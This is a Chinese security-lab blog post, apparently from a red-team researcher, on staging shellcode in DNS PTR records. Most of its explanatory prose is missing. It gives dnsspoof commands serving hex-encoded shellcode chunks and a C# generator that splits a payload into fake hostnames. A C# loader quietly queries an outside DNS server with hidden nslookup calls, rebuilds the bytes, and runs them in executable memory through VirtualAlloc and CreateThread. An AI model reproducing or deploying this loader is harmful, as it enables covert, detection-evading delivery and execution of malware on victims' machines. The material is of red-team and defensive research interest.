作者简介 /Profile/
罗逸,平安科技银河实验室资深安全研究员,从业7年,专注红蓝对抗研究,擅长免杀技术、目标控制、内网渗透等。
-
0x01 什么是DNS反向解析
-
0x02 利用思路
-
2.1 工具dnsspoof
-
2.2 思路
-
2.3 优点
-
2.4 缺点
-
0x03 C#实现DNS反向解析传输数据
-
3.1 DnsHostCreate
-
3.2 启动dns服务
-
3.3 C# DNS text Loader
-
0x04 运行结果
-
0x05 结论
0x01 什么是DNS反向解析
0x02 利用思路
2.1 工具dnsspoof
192.168.1.0 "fc4883e4f0e8c8000000415141505251564831d265488b5260488b521848.google.com"
启动DNS欺骗
dnsspoof -f dns.txt
λ nslookup 192.168.1.0 10.0.0.8DNS request timed out.timeout was 2 seconds.服务器: UnKnownAddress: 10.0.0.8名称: "fc4883e4f0e8c8000000415141505251564831d265488b5260488b521848.google.com"Address: 192.168.1.0
2.2 思路
2.3 优点
2.4 缺点
0x03 C#实现DNS反向解析传输数据
3.1 DnsHostCreate
string domain = args[0];string ipsegment = args[1];string payload = args[2];string str = payload.Replace("0x","").Replace(", ","").Replace(" ","");
int dns_data_lenght = str.Length / 60;if(str.Length % 60 !=0 ){dns_data_lenght += 1;}
for (int i = 0; i < dns_data_lenght; i++){string dns = "";if (i == dns_data_lenght - 1){dns = str.Substring((dns_data_lenght - 1) * 60);}else{dns = str.Substring(i * 60, 60);}Console.WriteLine(string.Format("{0}.{1} "{2}.{3}"", ipsegment, i.ToString(),dns,domain));}
192.168.1.0 "fc4883e4f0e8c8000000415141505251564831d265488b5260488b521848.google.com"192.168.1.1 "8b5220488b7250480fb74a4a4d31c94831c0ac3c617c022c2041c1c90d41.google.com"192.168.1.2 "01c1e2ed524151488b52208b423c4801d0668178180b0275728b80880000.google.com"...192.168.1.29 "9689e2ffd54883c42085c074b6668b074801c385c075d758585848050000.google.com"192.168.1.30 "000050c3e87ffdffff31302e302e302e380000000000.google.com"
[!] IPaddress Counter is: 31[!] IP Segment: 192.168.1.
3.2 启动DNS服务
apt-get install dnsspoof -ydnsspoof -f dns.txt
λ nslookup 192.168.1.0 10.0.0.8DNS request timed out.timeout was 2 seconds.服务器: UnKnownAddress: 10.0.0.8名称: "fc4883e4f0e8c8000000415141505251564831d265488b5260488b521848.google.com"Address: 192.168.1.0
3.3 C# DNS text Loader
string _DnsServer = "10.0.0.8";string _IPaddress_Begin = "192.168.1.";int _IPaddress_Counter = 31;
ProcessStartInfo ns_Prcs_info = new ProcessStartInfo("nslookup.exe", DNS_PTR_A + " " + DnsServer);ns_Prcs_info.RedirectStandardInput = true;ns_Prcs_info.RedirectStandardOutput = true;ns_Prcs_info.UseShellExecute = false;var random = new Random();System.Threading.Thread.Sleep(random.Next(1, 800));Process nslookup = new Process();nslookup.StartInfo = ns_Prcs_info;nslookup.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;nslookup.Start();string computerList = nslookup.StandardOutput.ReadToEnd();
DNS request timed out.timeout was 2 seconds.服务器: UnKnownAddress: 10.0.0.8名称: "fc4883e4f0e8c8000000415141505251564831d265488b5260488b521848.google.com"Address: 192.168.1.0
string[] lines = computerList.Split('r', 'n');string last_line = lines[lines.Length - 4];string temp_1 = last_line.Remove(0, 9);_Records = """ + temp_1;int i = temp_1.LastIndexOf('.');string temp_2 = temp_1.Remove(i, (temp_1.Length - i));int b = temp_2.LastIndexOf('.');string final = temp_2.Remove(b, temp_2.Length - b);
for (int i = 0; i < _IPaddress_Counter; i++){_DATA[i] = __nslookup(_IPaddress_Begin + i, _DnsServer);DATA += _DATA[i].ToString();}
object tmp = new object();byte[] __Bytes = new byte[DATA.Length / 2];for (int i = 0; i < __Bytes.Length - 1; i++){int start = i * 2;tmp = DATA.Substring(start, 2);byte current = Convert.ToByte("0x" + tmp.ToString(), 16);__Bytes[i] = current;}
调用创建线程来运行payload
UInt32 funcAddr = VirtualAlloc(0, (UInt32)__Bytes.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);Marshal.Copy(__Bytes, 0, (IntPtr)(funcAddr), __Bytes.Length);IntPtr hThread = IntPtr.Zero;UInt32 threadId = 0;IntPtr pinfo = IntPtr.Zero;hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);WaitForSingleObject(hThread, 0xFFFFFFFF);
0x04 运行结果
0x05 结论
银河实验室
往期回顾
技术
技术
技术
技术
长按识别二维码关注我们
微信号:PSRC_Team
球分享
球点赞
球在看
原文始发于微信公众号(平安集团安全应急响应中心):利用DNS 反向解析执行shellcode
